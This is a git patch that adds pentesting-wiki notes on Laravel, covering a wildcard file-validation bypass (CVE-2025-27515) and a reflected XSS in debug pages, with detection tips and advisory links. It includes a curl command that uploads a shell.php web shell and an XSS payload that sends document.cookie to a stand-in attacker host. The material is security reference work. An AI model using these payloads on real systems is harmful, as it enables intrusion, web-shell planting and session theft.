From 39338d2c3012ebb8b4d0b618ae02dee507724f8a Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Mon, 22 Dec 2025 01:54:20 +0000
Subject: [PATCH] Add content from: Research Update: Enhanced
 src/network-services-pentesting/pe...

---
 src/SUMMARY.md                                |  1 +
 .../inputmethodservice-ime-abuse.md           |  1 +
 .../pentesting-web/laravel.md                 | 55 +++++++++++++++++++
 3 files changed, 57 insertions(+)

diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index fdf253b1bef..9ac5c0d0b19 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -375,6 +375,7 @@
     - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
   - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
   - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
+  - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
   - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
   - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
   - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
index 878d498c40e..8251e907770 100644
--- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
+++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
@@ -81,3 +81,4 @@ adb shell ime help
 - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
 - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI).
 
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md
index 9a85749ac52..315ec716dd1 100644
--- a/src/network-services-pentesting/pentesting-web/laravel.md
+++ b/src/network-services-pentesting/pentesting-web/laravel.md
@@ -134,6 +134,33 @@ email=a@b.c&password=whatever&remember=0xdf
 
 ---
 
+## CVE-2025-27515 – Wildcard file validation bypass (`files.*`)
+
+Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 let crafted multipart requests completely skip any rule attached to `files.*` / `images.*`. The parser that expands wildcard keys could be confused with attacker-controlled placeholders (for example, pre-populating `__asterisk__` segments), so the framework would hydrate `UploadedFile` objects without ever running `image`, `mimes`, `dimensions`, `max`, etc. Once a malicious blob lands in `Storage::putFile*` you can pivot to any of the file-upload primitives already listed in HackTricks (web shells, log poisoning, signed job deserialization, …).
+
+### Hunting for the pattern
+
+* Static: `rg -n "files\\.\*" -g"*.php" app/` or inspect `FormRequest` classes for `rules()` returning arrays that contain `files.*`.
+* Dynamic: hook `Illuminate\Validation\Validator::validate()` via Xdebug or Laravel Telescope in pre-production to log every request that hits the vulnerable rule.
+* Middleware/route review: endpoints bundling multiple files (avatar importers, document portals, drag-n-drop components) tend to trust `files.*`.
+
+### Practical exploitation workflow
+
+1. Capture a legitimate upload and replay it in Burp Repeater.
+2. Duplicate the same part but alter the field name so it already includes placeholder tokens (e.g., `files[0][__asterisk__payload]`) or nest another array (`files[0][alt][0]`). On vulnerable builds, that second part never gets validated but still becomes an `UploadedFile` entry.
+3. Point the forged file to a PHP payload (`shell.php`, `.phar`, polyglot) and force the application to store it in a web-accessible disk (commonly `public/` once `php artisan storage:link` is enabled).
+
+```bash
+curl -sk https://target/upload \
+  -F 'files[0]=@ok.png;type=image/png' \
+  -F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
+  -F 'description=lorem'
+```
+
+Keep fuzzing key names (`files.__dot__0`, `files[0][0]`, `files[0][uuid]` …) until you find one that bypasses the validator but still gets written to disk; patched versions reject these crafted attribute names immediately.
+
+---
+
 ## Laravel Tricks
 
 ### Debugging mode
@@ -145,6 +172,27 @@ For example `http://127.0.0.1:8000/profiles`:
 
 This is usually needed for exploiting other Laravel RCE CVEs.
 
+#### CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages
+
+* Affected: Laravel 11.9.0–11.35.1 with `APP_DEBUG=true` (either globally or forced via misconfigured env overrides like CVE-2024-52301).
+* Primitive: every uncaught exception rendered by Whoops echoes parts of the request/route **without HTML encoding**, so injecting `<img src>` / `<script>` in a route or request parameter yields stored-on-response XSS before authentication.
+* Impact: steal `XSRF-TOKEN`, leak stack traces with secrets, open a browser-based pivot to hit `_ignition/execute-solution` in victim sessions, or chain with passwordless dashboards that rely on cookies.
+
+Minimal PoC:
+
+```php
+// blade/web.php (attacker-controlled param reflected)
+Route::get('/boom/{id}', function ($id) {
+    abort(500);
+});
+```
+
+```bash
+curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"
+```
+
+Even if debug mode is normally off, forcing an error via background jobs or queue workers and probing the `_ignition/health-check` endpoint often reveals staging hosts that still expose this chain.
+
 ### Fingerprinting & exposed dev endpoints
 
 Quick checks to identify a Laravel stack and dangerous dev tooling exposed in production:
@@ -172,6 +220,9 @@ Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:
 
 ### Decrypt Cookie
 
+<details>
+<summary>Decrypt/encrypt cookies helper (Python)</summary>
+
 ```python
 import os
 import json
@@ -231,6 +282,8 @@ decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1
 encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605141157}')
 ```
 
+</details>
+
 ### Laravel Deserialization RCE
 
 Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
@@ -255,6 +308,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
 * [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
 * [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
 * [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
+* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
+* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
 
 
 {{#include ../../banners/hacktricks-training.md}}